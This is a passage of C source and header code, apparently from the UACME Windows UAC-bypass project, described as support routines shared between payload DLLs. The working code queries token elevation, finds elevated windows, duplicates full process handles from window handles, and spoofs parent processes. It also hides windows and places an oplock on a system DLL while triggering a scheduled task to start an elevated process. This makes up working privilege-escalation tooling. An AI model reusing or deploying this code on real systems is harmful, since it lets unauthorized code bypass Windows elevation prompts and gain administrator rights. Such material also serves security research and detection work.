_strcat(lpReport, TEXT("Non-existent Process"));
}
_strcat(lpReport, TEXT(")"));
}
//
// 3. Query various token releated data.
//
//
// 3.1 Integrity value.
// 3.2 User\Domain name
// 3.3 Session info
//
status = NtOpenProcessToken(
NtCurrentProcess(),
TOKEN_QUERY,
&hToken);
if (NT_SUCCESS(status)) {
LengthNeeded = 0;
status = NtQueryInformationToken(
hToken,
TokenIntegrityLevel,
NULL,
0,
&LengthNeeded);
if (status == STATUS_BUFFER_TOO_SMALL) {
pTIL = (PTOKEN_MANDATORY_LABEL)ucmxHeapAlloc(LengthNeeded);
if (pTIL) {
status = NtQueryInformationToken(
hToken,
TokenIntegrityLevel,
pTIL,
LengthNeeded,
&LengthNeeded);
if (NT_SUCCESS(status)) {
dwIntegrityLevel = *RtlSubAuthoritySid(pTIL->Label.Sid,
(DWORD)(UCHAR)(*RtlSubAuthorityCountSid(pTIL->Label.Sid) - 1));
if (dwIntegrityLevel == SECURITY_MANDATORY_UNTRUSTED_RID) {
lpValue = L"UntrustedIL";
}
else if (dwIntegrityLevel == SECURITY_MANDATORY_LOW_RID) {
lpValue = L"LowIL";
}
else if (dwIntegrityLevel >= SECURITY_MANDATORY_MEDIUM_RID &&
dwIntegrityLevel < SECURITY_MANDATORY_HIGH_RID) //skip SECURITY_MANDATORY_MEDIUM_PLUS_RID
{
lpValue = L"MediumIL";
}
else if (dwIntegrityLevel >= SECURITY_MANDATORY_HIGH_RID &&
dwIntegrityLevel < SECURITY_MANDATORY_SYSTEM_RID)
{
lpValue = L"HighIL";
}
else if (dwIntegrityLevel >= SECURITY_MANDATORY_SYSTEM_RID &&
dwIntegrityLevel < SECURITY_MANDATORY_PROTECTED_PROCESS_RID)
{
lpValue = L"SystemIL";
}
else if (dwIntegrityLevel >= SECURITY_MANDATORY_PROTECTED_PROCESS_RID)
{
lpValue = L"ProtectedProcessIL";
}
_strcpy(szBuffer, TEXT("\r\nPID="));
ultostr((ULONG)GetCurrentProcessId(), _strend(szBuffer));
_strcat(szBuffer, TEXT(", "));
_strncpy(_strend(szBuffer), 40, lpValue, 40);
_strcat(lpReport, szBuffer);
}
ucmxHeapFree(pTIL);
}
}
//
// Domain\User name.
//
LengthNeeded = 0;
status = NtQueryInformationToken(
hToken,
TokenUser,
NULL,
0,
&LengthNeeded);
if (status == STATUS_BUFFER_TOO_SMALL) {
ptu = (PTOKEN_USER)ucmxHeapAlloc(LengthNeeded);
if (ptu) {
status = NtQueryInformationToken(
hToken,
TokenUser,
ptu,
LengthNeeded,
&LengthNeeded);
if (NT_SUCCESS(status)) {
SecurityQualityOfService.Length = sizeof(SECURITY_QUALITY_OF_SERVICE);
SecurityQualityOfService.ImpersonationLevel = SecurityImpersonation;
SecurityQualityOfService.ContextTrackingMode = SECURITY_DYNAMIC_TRACKING;
SecurityQualityOfService.EffectiveOnly = FALSE;
InitializeObjectAttributes(
&lobja,
NULL,
0L,
NULL,
NULL);
lobja.SecurityQualityOfService = &SecurityQualityOfService;
status = LsaOpenPolicy(
NULL,
&lobja,
POLICY_LOOKUP_NAMES,
&PolicyHandle);
if (NT_SUCCESS(status)) {
status = LsaLookupSids(
PolicyHandle,
1,
&ptu->User.Sid,
&ReferencedDomains,
&Names);
if ((NT_SUCCESS(status)) && (status != STATUS_SOME_NOT_MAPPED)) {
if (ReferencedDomains != NULL) {
szBuffer[0] = 0;
_strncpy(
szBuffer,
MAX_PATH,
ReferencedDomains->Domains[0].Name.Buffer,
ReferencedDomains->Domains[0].Name.Length / sizeof(WCHAR));
_strcat(lpReport, TEXT("\r\n"));
_strcat(lpReport, szBuffer);
_strcat(lpReport, TEXT("\\"));
}
if (Names != NULL) {
szBuffer[0] = 0;
_strncpy(
szBuffer,
MAX_PATH,
Names->Name.Buffer,
Names->Name.Length / sizeof(WCHAR));
_strcat(lpReport, szBuffer);
}
}
if (ReferencedDomains) LsaFreeMemory(ReferencedDomains);
if (Names) LsaFreeMemory(Names);
LsaClose(PolicyHandle);
}
}
ucmxHeapFree(ptu);
}
}
//
// Session info
//
LengthNeeded = 0;
_strcpy(szBuffer, TEXT("\r\nSessionId="));
ultostr(SessionId, _strend(szBuffer));
_strcat(lpReport, szBuffer);
_strcat(lpReport, TEXT("\r\nInteractive Winstation="));
if (ucmIsUserWinstaInteractive())
_strcat(lpReport, TEXT("yes"));
else
_strcat(lpReport, TEXT("no"));
NtClose(hToken);
}
//
// 4. Wow64
//
RtlSecureZeroMemory(&pebi, sizeof(pebi));
pebi.Size = sizeof(PROCESS_EXTENDED_BASIC_INFORMATION);
status = NtQueryInformationProcess(
NtCurrentProcess(),
ProcessBasicInformation,
&pebi,
sizeof(pebi),
NULL);
if (NT_SUCCESS(status)) {
_strcpy(szBuffer, TEXT("\r\nWOW64 Enabled="));
ultostr(pebi.IsWow64Process, _strend(szBuffer));
_strcat(lpReport, szBuffer);
}
if (ReturnData == FALSE) {
MessageBox(
GetDesktopWindow(),
lpReport,
GetCommandLine(),
MB_ICONINFORMATION);
ucmxHeapFree(lpReport);
lpReport = NULL;
}
return lpReport;
}
/*
* ucmDestroyRuntimeInfo
*
* Purpose:
*
* Release memory allocated by ucmQueryRuntimeInfo if ReturnData flag used.
*
*/
BOOLEAN ucmDestroyRuntimeInfo(
_In_ LPWSTR RuntimeInfo)
{
return ucmxHeapFree((PVOID)RuntimeInfo);
}
/*
* ucmIsUserWinstaInteractive
*
* Purpose:
*
* Return TRUE if current user operates on Winstation with visible surfaces, FALSE otherwise.
*
*/
BOOL ucmIsUserWinstaInteractive(
VOID
)
{
BOOL bResult = TRUE;
USEROBJECTFLAGS uof;
HWINSTA hWinStation;
//
// Open current winstation.
//
hWinStation = GetProcessWindowStation();
if (hWinStation) {
//
// Query winstation flags.
//
if (GetUserObjectInformation(
hWinStation,
UOI_FLAGS,
&uof,
sizeof(USEROBJECTFLAGS),
NULL))
{
//
// Are winstation has visible surfaces?
//
if ((uof.dwFlags & WSF_VISIBLE) == 0)
bResult = FALSE;
}
}
return bResult;
}
/*
* ucmIsUserHasInteractiveSid
*
* Purpose:
*
* pbInteractiveSid will be set to TRUE if current user has interactive sid, FALSE otherwise.
*
* Function return operation status code.
*
*/
NTSTATUS ucmIsUserHasInteractiveSid(
_In_ HANDLE hToken,
_Out_ PBOOL pbInteractiveSid)
{
BOOL IsInteractiveSid = FALSE;
NTSTATUS status = STATUS_UNSUCCESSFUL;
ULONG LengthNeeded = 0;
DWORD i;
SID_IDENTIFIER_AUTHORITY SidAuth = SECURITY_NT_AUTHORITY;
PSID InteractiveSid = NULL;
PTOKEN_GROUPS groupInfo = NULL;
do {
status = NtQueryInformationToken(
hToken,
TokenGroups,
NULL,
0,
&LengthNeeded);
if (status != STATUS_BUFFER_TOO_SMALL)
break;
groupInfo = (PTOKEN_GROUPS)ucmxHeapAlloc(LengthNeeded);
if (groupInfo == NULL)
break;
status = NtQueryInformationToken(
hToken,
TokenGroups,
groupInfo,
LengthNeeded,
&LengthNeeded);
if (!NT_SUCCESS(status))
break;
status = RtlAllocateAndInitializeSid(
&SidAuth,
1,
SECURITY_INTERACTIVE_RID,
0, 0, 0, 0, 0, 0, 0,
&InteractiveSid);
if (!NT_SUCCESS(status))
break;
for (i = 0; i < groupInfo->GroupCount; i++) {
if (RtlEqualSid(
InteractiveSid,
groupInfo->Groups[i].Sid))
{
IsInteractiveSid = TRUE;
break;
}
}
} while (FALSE);
if (groupInfo != NULL)
ucmxHeapFree(groupInfo);
if (pbInteractiveSid)
*pbInteractiveSid = IsInteractiveSid;
if (InteractiveSid)
RtlFreeSid(InteractiveSid);
return status;
}
/*
* ucmIsLocalSystem
*
* Purpose:
*
* pbResult will be set to TRUE if current account is run by system user, FALSE otherwise.
*
* Function return operation status code.
*
*/
NTSTATUS ucmIsLocalSystem(
_Out_ PBOOL pbResult)
{
BOOL bResult = FALSE;
NTSTATUS status = STATUS_UNSUCCESSFUL;
HANDLE hToken = NULL;
ULONG LengthNeeded = 0;
PSID SystemSid = NULL;
PTOKEN_USER ptu = NULL;
SID_IDENTIFIER_AUTHORITY NtAuth = SECURITY_NT_AUTHORITY;
status = NtOpenProcessToken(
NtCurrentProcess(),
TOKEN_QUERY,
&hToken);
if (NT_SUCCESS(status)) {
status = NtQueryInformationToken(
hToken,
TokenUser,
NULL,
0,
&LengthNeeded);
if (status == STATUS_BUFFER_TOO_SMALL) {
ptu = (PTOKEN_USER)ucmxHeapAlloc(LengthNeeded);
if (ptu) {
status = NtQueryInformationToken(
hToken,
TokenUser,
ptu,
LengthNeeded,
&LengthNeeded);
if (NT_SUCCESS(status)) {
status = RtlAllocateAndInitializeSid(
&NtAuth,
1,
SECURITY_LOCAL_SYSTEM_RID,
0, 0, 0, 0, 0, 0, 0,
&SystemSid);
if (NT_SUCCESS(status)) {
bResult = RtlEqualSid(ptu->User.Sid, SystemSid);
RtlFreeSid(SystemSid);
}
}
ucmxHeapFree(ptu);
}
else {
status = STATUS_INSUFFICIENT_RESOURCES;
}
} //STATUS_BUFFER_TOO_SMALL
NtClose(hToken);
}
if (pbResult)
*pbResult = bResult;
return status;
}
/*
* ucmGetProcessElevationType
*
* Purpose:
*
* Returns process elevation type.
*
*/
BOOL ucmGetProcessElevationType(
_In_opt_ HANDLE ProcessHandle,
_Out_ TOKEN_ELEVATION_TYPE * lpType
)
{
HANDLE hToken = NULL, processHandle = ProcessHandle;
NTSTATUS Status;
ULONG BytesRead = 0;
TOKEN_ELEVATION_TYPE TokenType = TokenElevationTypeDefault;
if (ProcessHandle == NULL) {
processHandle = GetCurrentProcess();
}
Status = NtOpenProcessToken(processHandle, TOKEN_QUERY, &hToken);
if (NT_SUCCESS(Status)) {
Status = NtQueryInformationToken(hToken, TokenElevationType, &TokenType,
sizeof(TOKEN_ELEVATION_TYPE), &BytesRead);
NtClose(hToken);
}
if (lpType)
*lpType = TokenType;
return (NT_SUCCESS(Status));
}
/*
* ucmIsProcessElevated
*
* Purpose:
*
* Returns process elevation state.
*
*/
NTSTATUS ucmIsProcessElevated(
_In_ ULONG ProcessId,
_Out_ PBOOL Elevated)
{
NTSTATUS Status;
ULONG Dummy;
HANDLE ProcessHandle, TokenHandle;
CLIENT_ID ClientId;
TOKEN_ELEVATION TokenInfo;
OBJECT_ATTRIBUTES ObAttr = RTL_INIT_OBJECT_ATTRIBUTES(NULL, 0);
ClientId.UniqueProcess = UlongToHandle(ProcessId);
ClientId.UniqueThread = NULL;
if (Elevated) *Elevated = FALSE;
Status = NtOpenProcess(&ProcessHandle, MAXIMUM_ALLOWED, &ObAttr, &ClientId);
if (NT_SUCCESS(Status)) {
Status = NtOpenProcessToken(ProcessHandle, TOKEN_QUERY, &TokenHandle);
if (NT_SUCCESS(Status)) {
TokenInfo.TokenIsElevated = 0;
Status = NtQueryInformationToken(TokenHandle,
TokenElevation, &TokenInfo,
sizeof(TOKEN_ELEVATION), &Dummy);
if (NT_SUCCESS(Status)) {
if (Elevated) *Elevated = (TokenInfo.TokenIsElevated > 0);
}
NtClose(TokenHandle);
}
NtClose(ProcessHandle);
}
return Status;
}
/*
* ucmSetEnvironmentVariable
*
* Purpose:
*
* SetEnvironmentVariable replacement.
*
*/
BOOL ucmSetEnvironmentVariable(
_In_ LPCWSTR lpName,
_In_ LPCWSTR lpValue
)
{
NTSTATUS ntStatus;
UNICODE_STRING Name, Value;
ntStatus = RtlInitUnicodeStringEx(&Name, lpName);
if (!NT_SUCCESS(ntStatus)) {
return FALSE;
}
if (lpValue) {
ntStatus = RtlInitUnicodeStringEx(&Value, lpValue);
if (!NT_SUCCESS(ntStatus)) {
return FALSE;
}
ntStatus = RtlSetEnvironmentVariable(NULL, &Name, &Value);
}
else {
ntStatus = RtlSetEnvironmentVariable(NULL, &Name, NULL);
}
return (NT_SUCCESS(ntStatus));
}
//
// OpLocks from R41N3RZUF477.
//
/*
* ucmxWaitForOpLockThread
*
* Purpose:
*
* Thread procedure to wait for oplock notification.
*
*/
DWORD WINAPI ucmxWaitForOpLockThread(
_In_ LPVOID p)
{
DWORD bret = 0;
POPLOCK_FILE_CONTEXT ofc = (POPLOCK_FILE_CONTEXT)p;
if (p == NULL) {
return 1;
}
bret = 0;
if (!GetOverlappedResult(ofc->FileHandle, &ofc->Overlapped, &bret, TRUE)) {
return 1;
}
return 0;
}
/*
* ucmWaitForOpLock
*
* Purpose:
*
* Wait for oplock notification with timeout.
* Returns TRUE if oplock was successfully acquired and signaled, FALSE otherwise.
*
*/
BOOL ucmWaitForOpLock(
_In_ POPLOCK_FILE_CONTEXT ofc,
_In_ DWORD timeout
)
{
BOOL bResult = FALSE;
DWORD exitcode = 0;
HANDLE thread = NULL;
if (ofc == NULL || ofc->Length < sizeof(OPLOCK_FILE_CONTEXT)) {
return FALSE;
}
thread = CreateThread(NULL, 0x1000, (LPTHREAD_START_ROUTINE)ucmxWaitForOpLockThread,
(LPVOID)ofc, STACK_SIZE_PARAM_IS_A_RESERVATION, NULL);
if (thread == NULL)
return FALSE;
do {
if (WaitForSingleObject(thread, timeout) != WAIT_OBJECT_0) {
TerminateThread(thread, 1);
break;
}
if (GetExitCodeThread(thread, &exitcode)) {
bResult = (exitcode == 0);
}
} while (FALSE);
CloseHandle(thread);
return bResult;
}
BOOL ucmReleaseOpLock(
_In_ POPLOCK_FILE_CONTEXT ofc
)
{
if (ofc == NULL) {
return FALSE;
}
if (ofc->Length < sizeof(OPLOCK_FILE_CONTEXT)) {
return FALSE;
}
CloseHandle(ofc->Overlapped.hEvent);
CloseHandle(ofc->FileHandle);
return TRUE;
}
BOOL ucmOpLockFile(
_In_ LPCWSTR FileName,
_In_ ACCESS_MASK DesiredAccess,
_In_ DWORD ShareMode,
_In_ BOOL Exclusive,
_In_ POPLOCK_FILE_CONTEXT ofc
)
{
DWORD bret = 0;
REQUEST_OPLOCK_INPUT_BUFFER roib;
REQUEST_OPLOCK_OUTPUT_BUFFER roob;
DWORD flags = 0;
if (FileName == NULL || ofc == NULL) {
return FALSE;
}
if (ofc->Length < sizeof(OPLOCK_FILE_CONTEXT)) {
return FALSE;
}
RtlSecureZeroMemory(&ofc->Overlapped, sizeof(OVERLAPPED));
RtlSecureZeroMemory(&roib, sizeof(roib));
RtlSecureZeroMemory(&roob, sizeof(roob));
roib.StructureLength = sizeof(roib);
roib.StructureVersion = REQUEST_OPLOCK_CURRENT_VERSION;
roib.RequestedOplockLevel = OPLOCK_LEVEL_CACHE_READ | OPLOCK_LEVEL_CACHE_HANDLE;
roib.Flags = REQUEST_OPLOCK_INPUT_FLAG_REQUEST;
roob.StructureLength = sizeof(roob);
roob.StructureVersion = REQUEST_OPLOCK_CURRENT_VERSION;
ofc->Overlapped.hEvent = CreateEvent(NULL, TRUE, FALSE, NULL);
if (ofc->Overlapped.hEvent == NULL) {
return FALSE;
}
flags = FILE_FLAG_OVERLAPPED;
if (GetFileAttributes(FileName) & FILE_ATTRIBUTE_DIRECTORY) {
flags |= FILE_FLAG_BACKUP_SEMANTICS | FILE_FLAG_OPEN_REPARSE_POINT;
}
if (DesiredAccess == 0) {
DesiredAccess = GENERIC_READ;
}
ofc->FileHandle = CreateFile(FileName, DesiredAccess, ShareMode, NULL, OPEN_EXISTING, flags, NULL);
if (ofc->FileHandle == INVALID_HANDLE_VALUE) {
return FALSE;
}
if (Exclusive) {
bret = 0;
DeviceIoControl(ofc->FileHandle, FSCTL_REQUEST_OPLOCK_LEVEL_1, NULL, 0, NULL, 0, &bret, &ofc->Overlapped);
}
else {
DeviceIoControl(ofc->FileHandle, FSCTL_REQUEST_OPLOCK, &roib, sizeof(roib), &roob, sizeof(roob), NULL, &ofc->Overlapped);
}
if (GetLastError() != ERROR_IO_PENDING) {
return FALSE;
}
return TRUE;
}
//
// OpLocks from R41N3RZUF477 end.
//
/*
* ucmxHideMainWindowCallback
*
* Purpose:
*
* EnumWindows callback to hide windows belonging to current process.
*
*/
BOOL ucmxHideMainWindowCallback(
_In_ HWND hwnd,
_In_ LPARAM lParam
)
{
DWORD pid = 0;
UNREFERENCED_PARAMETER(lParam);
GetWindowThreadProcessId(hwnd, &pid);
if (pid == 0)
return TRUE;
if (GetCurrentProcessId() != pid)
return TRUE;
if (GetWindow(hwnd, GW_OWNER))
return TRUE;
if (!IsWindowVisible(hwnd))
return TRUE;
ShowWindow(hwnd, SW_HIDE);
return TRUE;
}
/*
* ucmHideMainWindow
*
* Purpose:
*
* Hide current process windows.
*
*/
VOID ucmHideMainWindow(
VOID
)
{
EnumWindows((WNDENUMPROC)ucmxHideMainWindowCallback, 0);
}
/*
* ucmCheckUIAccessPermissions
*
* Purpose:
*
* Check if current process token has UIAccess flag and high integrity level.
*
*/
BOOL ucmCheckUIAccessPermissions(
VOID)
{
BOOL bResult = FALSE;
HANDLE hToken = NULL;
BYTE tmlbuf[sizeof(TOKEN_MANDATORY_LABEL) + sizeof(SID)];
TOKEN_MANDATORY_LABEL* tml = (TOKEN_MANDATORY_LABEL*)&tmlbuf[0];
DWORD UIAccessFlag = 0;
DWORD* pdwIntegrityLevel = NULL;
DWORD retLen = 0;
do {
if (!NT_SUCCESS(NtOpenProcessToken(
NtCurrentProcess(),
MAXIMUM_ALLOWED,
&hToken)))
{
break;
}
retLen = sizeof(UIAccessFlag);
if (!GetTokenInformation(hToken, TokenUIAccess, &UIAccessFlag, sizeof(UIAccessFlag), &retLen))
break;
if (UIAccessFlag == 0)
break;
retLen = sizeof(tmlbuf);
if (!GetTokenInformation(hToken, TokenIntegrityLevel, tml, retLen, &retLen))
break;
pdwIntegrityLevel = GetSidSubAuthority(tml->Label.Sid, 0);
if (*pdwIntegrityLevel < SECURITY_MANDATORY_HIGH_RID)
break;
bResult = TRUE;
} while (FALSE);
if (hToken) NtClose(hToken);
return bResult;
}
typedef HANDLE(WINAPI* pfnGetProcessHandleFromHwnd)(HWND hwnd);
/*
* ucmCallGetProcessHandleFromHwnd
*
* Purpose:
*
* Wrapper for oleacc!GetProcessHandleFromHwnd.
*
*/
HANDLE ucmCallGetProcessHandleFromHwnd(
_In_ HWND hwnd
)
{
HANDLE process = NULL;
HMODULE oleacc = NULL;
pfnGetProcessHandleFromHwnd pGetProcessHandleFromHwnd = NULL;
oleacc = LoadLibrary(L"oleacc.dll");
if (oleacc) {
pGetProcessHandleFromHwnd = (pfnGetProcessHandleFromHwnd)GetProcAddress(oleacc, "GetProcessHandleFromHwnd");
if (pGetProcessHandleFromHwnd) {
process = pGetProcessHandleFromHwnd(hwnd);
}
FreeLibrary(oleacc);
}
return process;
}
/*
* ucmCreateProcessWithParent
*
* Purpose:
*
* CreateProcess with parent process set.
*
*/
BOOL ucmCreateProcessWithParent(
_In_ LPWSTR lpCommandLine,
_In_ HANDLE hParent,
_In_ DWORD dwFlags,
_In_ WORD wShow,
_In_ PROCESS_INFORMATION* pi
)
{
SIZE_T ptsize = 0;
STARTUPINFOEX si;
LPPROC_THREAD_ATTRIBUTE_LIST ptal = NULL;
BOOL bResult = FALSE;
if (pi) {
InitializeProcThreadAttributeList(NULL, 1, 0, &ptsize);
ptal = (LPPROC_THREAD_ATTRIBUTE_LIST)ucmxHeapAlloc(ptsize);
if (ptal) {
RtlSecureZeroMemory(&si, sizeof(si));
si.StartupInfo.cb = sizeof(si);
si.StartupInfo.dwFlags = STARTF_FORCEOFFFEEDBACK | STARTF_USESHOWWINDOW;
si.StartupInfo.wShowWindow = wShow;
if (InitializeProcThreadAttributeList(ptal, 1, 0, &ptsize)) {
if (UpdateProcThreadAttribute(ptal, 0, PROC_THREAD_ATTRIBUTE_PARENT_PROCESS, &hParent, sizeof(HANDLE), NULL, NULL))
{
si.lpAttributeList = ptal;
bResult = CreateProcess(NULL, lpCommandLine, NULL, NULL, FALSE,
EXTENDED_STARTUPINFO_PRESENT | dwFlags, NULL, NULL, (STARTUPINFO*)&si, pi);
}
DeleteProcThreadAttributeList(ptal);
}
ucmxHeapFree(ptal);
}
}
return bResult;
}
/*
* ucmGetHwndFullProcessHandle
*
* Purpose:
*
* Duplicate process handle from hwnd.
*
*/
HANDLE ucmGetHwndFullProcessHandle(
_In_ HWND hwnd
)
{
HANDLE hProcess = NULL;
HANDLE hDuplicate = NULL;
hProcess = ucmCallGetProcessHandleFromHwnd(hwnd);
if (hProcess) {
DuplicateHandle(hProcess, (HANDLE)-1, (HANDLE)-1, &hDuplicate, 0, FALSE, DUPLICATE_SAME_ACCESS);
CloseHandle(hProcess);
}
return hDuplicate;
}
/*
* ucmxEnumElevatedWindows
*
* Purpose:
*
* EnumWindows callback to find first window belonging to elevated process.
*
*/
BOOL ucmxEnumElevatedWindows(
_In_ HWND hwnd,
_In_ LPARAM lParam)
{
DWORD dwPid = 0;
HANDLE hProcess = NULL;
HANDLE hToken = NULL;
DWORD tkElvType = 0;
DWORD retLen = 0;
GetWindowThreadProcessId(hwnd, &dwPid);
if (dwPid == 0) {
// Continue to next window.
return TRUE;
}
hProcess = OpenProcess(PROCESS_QUERY_LIMITED_INFORMATION, FALSE, dwPid);
if (hProcess == NULL) {
// Continue to next window.
return TRUE;
}
if (!OpenProcessToken(hProcess, MAXIMUM_ALLOWED, &hToken)) {
// Continue to next window.
CloseHandle(hProcess);
return TRUE;
}
CloseHandle(hProcess);
retLen = 0;
if (!GetTokenInformation(hToken, TokenElevationType, &tkElvType, sizeof(tkElvType), &retLen)) {
// Continue to next window.
CloseHandle(hToken);
return TRUE;
}
CloseHandle(hToken);
if (tkElvType == TokenElevationTypeFull) {
//
// Stop enumeration and return hwnd.
//
*(HWND*)lParam = hwnd;
return FALSE;
}
return TRUE;
}
/*
* ucmFindFirstElevatedWindow
*
* Purpose:
*
* Find first elevated window.
*
*/
HWND ucmFindFirstElevatedWindow(
VOID
)
{
HWND hwnd = NULL;
EnumWindows((WNDENUMPROC)ucmxEnumElevatedWindows, (LPARAM)&hwnd);
return hwnd;
}
/*
* ucmStartBackupLockedElevatedProcess
*
* Purpose:
*
* Create oplock on system file and run elevated task through schtasks.exe.
*
*/
BOOL ucmStartBackupLockedElevatedProcess(
_In_ POPLOCK_FILE_CONTEXT ofc
)
{
BOOL bResult = FALSE;
WCHAR szTaskCmdLine[MAX_PATH * 4];
WCHAR szOplockPath[MAX_PATH * 2];
PROCESS_INFORMATION pi;
STARTUPINFO si;
DWORD dwExitCode = 1;
if (ofc == NULL || ofc->Length < sizeof(OPLOCK_FILE_CONTEXT)) {
return FALSE;
}
RtlSecureZeroMemory(szOplockPath, sizeof(szOplockPath));
ucmxQuerySystemDirectory(szOplockPath, FALSE);
_strcpy(szTaskCmdLine, szOplockPath);
_strcat(szOplockPath, L"WiFiCloudStore.dll");
_strcat(szTaskCmdLine, L"\\schtasks.exe /RUN /TN \"\\Microsoft\\Windows\\WlanSvc\\CDSSync\" /I");
if (!ucmOpLockFile(szOplockPath,
GENERIC_READ,
FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE,
TRUE,
ofc))
{
return FALSE;
}
RtlSecureZeroMemory(&pi, sizeof(pi));
RtlSecureZeroMemory(&si, sizeof(si));
si.cb = sizeof(si);
si.dwFlags = STARTF_FORCEOFFFEEDBACK | STARTF_USESHOWWINDOW;
si.wShowWindow = SW_HIDE;
if (!CreateProcess(NULL, szTaskCmdLine, NULL, NULL, FALSE,
CREATE_NEW_CONSOLE, NULL, NULL, &si, &pi))
{
ucmReleaseOpLock(ofc);
return FALSE;
}
CloseHandle(pi.hThread);
if (WaitForSingleObject(pi.hProcess, 3000) == WAIT_OBJECT_0) {
if (GetExitCodeProcess(pi.hProcess, &dwExitCode)) {
bResult = (dwExitCode == 0);
}
}
CloseHandle(pi.hProcess);
if (!bResult) {
ucmReleaseOpLock(ofc);
}
return bResult;
}
================================================
FILE: Source/Shared/util.h
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2017 - 2025
*
* TITLE: UTIL.H
*
* VERSION: 3.68
*
* DATE: 07 Mar 2025
*
* Global support routines header file shared between payload dlls.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
typedef struct _UACME_PARAM_BLOCK {
ULONG Crc32;
ULONG SessionId;
ULONG AkagiFlag;
WCHAR szParameter[MAX_PATH + 1];
WCHAR szDesktop[MAX_PATH + 1];
WCHAR szWinstation[MAX_PATH + 1];
WCHAR szSignalObject[MAX_PATH + 1];
} UACME_PARAM_BLOCK, * PUACME_PARAM_BLOCK;
typedef BOOL(WINAPI* PFNCREATEPROCESSW)(
LPCWSTR lpApplicationName,
LPWSTR lpCommandLine,
LPSECURITY_ATTRIBUTES lpProcessAttributes,
LPSECURITY_ATTRIBUTES lpThreadAttributes,
BOOL bInheritHandles,
DWORD dwCreationFlags,
LPVOID lpEnvironment,
LPCWSTR lpCurrentDirectory,
LPSTARTUPINFOW lpStartupInfo,
LPPROCESS_INFORMATION lpProcessInformation);
typedef BOOL(WINAPI* PFNCREATEPROCESSASUSERW)(
_In_opt_ HANDLE hToken,
_In_opt_ LPCWSTR lpApplicationName,
_Inout_opt_ LPWSTR lpCommandLine,
_In_opt_ LPSECURITY_ATTRIBUTES lpProcessAttributes,
_In_opt_ LPSECURITY_ATTRIBUTES lpThreadAttributes,
_In_ BOOL bInheritHandles,
_In_ DWORD dwCreationFlags,
_In_opt_ LPVOID lpEnvironment,
_In_opt_ LPCWSTR lpCurrentDirectory,
_In_ LPSTARTUPINFOW lpStartupInfo,
_Out_ LPPROCESS_INFORMATION lpProcessInformation);
typedef struct _OBJSCANPARAM {
PWSTR Buffer;
SIZE_T BufferSize;
} OBJSCANPARAM, * POBJSCANPARAM;
typedef struct _OPLOCK_FILE_CONTEXT {
DWORD Length;
HANDLE FileHandle;
OVERLAPPED Overlapped;
} OPLOCK_FILE_CONTEXT, * POPLOCK_FILE_CONTEXT;
VOID ucmBinTextEncode(
_In_ unsigned __int64 x,
_Inout_ wchar_t* s);
VOID ucmGenerateSharedObjectName(
_In_ WORD ObjectId,
_Inout_ LPWSTR lpBuffer);
BOOLEAN ucmPrivilegeEnabled(
_In_ HANDLE hToken,
_In_ ULONG Privilege);
NTSTATUS ucmCreateSyncMutant(
_Out_ PHANDLE phMutant);
BOOLEAN ucmIsProcess32bit(
_In_ HANDLE hProcess);
DWORD ucmGetHashForString(
_In_ char* s);
LPVOID ucmGetProcedureAddressByHash(
_In_ PVOID ImageBase,
_In_ DWORD ProcedureHash);
VOID ucmGetStartupInfo(
_In_ LPSTARTUPINFOW lpStartupInfo);
DWORD ucmExpandEnvironmentStrings(
_In_ LPCWSTR lpSrc,
_Out_writes_to_opt_(nSize, return) LPWSTR lpDst,
_In_ DWORD nSize);
PVOID ucmGetSystemInfo(
_In_ SYSTEM_INFORMATION_CLASS SystemInformationClass);
BOOL ucmLaunchPayload(
_In_opt_ LPWSTR pszPayload,
_In_opt_ DWORD cbPayload);
BOOL ucmLaunchPayloadEx(
_In_ PFNCREATEPROCESSW pCreateProcess,
_In_opt_ LPWSTR pszPayload,
_In_opt_ DWORD cbPayload);
BOOL ucmLaunchPayload2(
_In_ PFNCREATEPROCESSASUSERW pCreateProcessAsUser,
_In_ BOOL bIsLocalSystem,
_In_ ULONG SessionId,
_In_opt_ LPWSTR pszPayload,
_In_opt_ DWORD cbPayload);
BOOL ucmLaunchPayload3(
_In_opt_ LPWSTR pszPayload,
_In_opt_ DWORD cbPayload);
LPWSTR ucmQueryRuntimeInfo(
_In_ BOOL ReturnData);
BOOLEAN ucmDestroyRuntimeInfo(
_In_ LPWSTR RuntimeInfo);
BOOL ucmIsUserWinstaInteractive(
VOID);
NTSTATUS ucmIsUserHasInteractiveSid(
_In_ HANDLE hToken,
_Out_ PBOOL pbInteractiveSid);
NTSTATUS ucmIsLocalSystem(
_Out_ PBOOL pbResult);
HANDLE ucmOpenAkagiNamespace(
VOID);
_Success_(return == TRUE)
BOOL ucmReadSharedParameters(
_Out_ UACME_PARAM_BLOCK * SharedParameters);
VOID ucmSetCompletion(
_In_ LPWSTR lpEvent);
BOOL ucmGetProcessElevationType(
_In_opt_ HANDLE ProcessHandle,
_Out_ TOKEN_ELEVATION_TYPE * lpType);
NTSTATUS ucmIsProcessElevated(
_In_ ULONG ProcessId,
_Out_ PBOOL Elevated);
PLARGE_INTEGER ucmFormatTimeOut(
_Out_ PLARGE_INTEGER TimeOut,
_In_ DWORD Milliseconds);
VOID ucmSleep(
_In_ DWORD Miliseconds);
BOOL ucmSetEnvironmentVariable(
_In_ LPCWSTR lpName,
_In_ LPCWSTR lpValue);
BOOL ucmOpLockFile(
_In_ LPCWSTR FileName,
_In_ ACCESS_MASK DesiredAccess,
_In_ DWORD ShareMode,
_In_ BOOL Exclusive,
_In_ POPLOCK_FILE_CONTEXT ofc);
BOOL ucmReleaseOpLock(
_In_ POPLOCK_FILE_CONTEXT ofc);
BOOL ucmWaitForOpLock(
_In_ POPLOCK_FILE_CONTEXT ofc,
_In_ DWORD timeout);
VOID ucmHideMainWindow(
VOID);
BOOL ucmCheckUIAccessPermissions(
VOID);
HANDLE ucmCallGetProcessHandleFromHwnd(
_In_ HWND hwnd);
BOOL ucmCreateProcessWithParent(
_In_ LPWSTR lpCommandLine,
_In_ HANDLE hParent,
_In_ DWORD dwFlags,
_In_ WORD wShow,
_In_ PROCESS_INFORMATION * pi);
HANDLE ucmGetHwndFullProcessHandle(
_In_ HWND hwnd);
HWND ucmFindFirstElevatedWindow(
VOID);
BOOL ucmStartBackupLockedElevatedProcess(
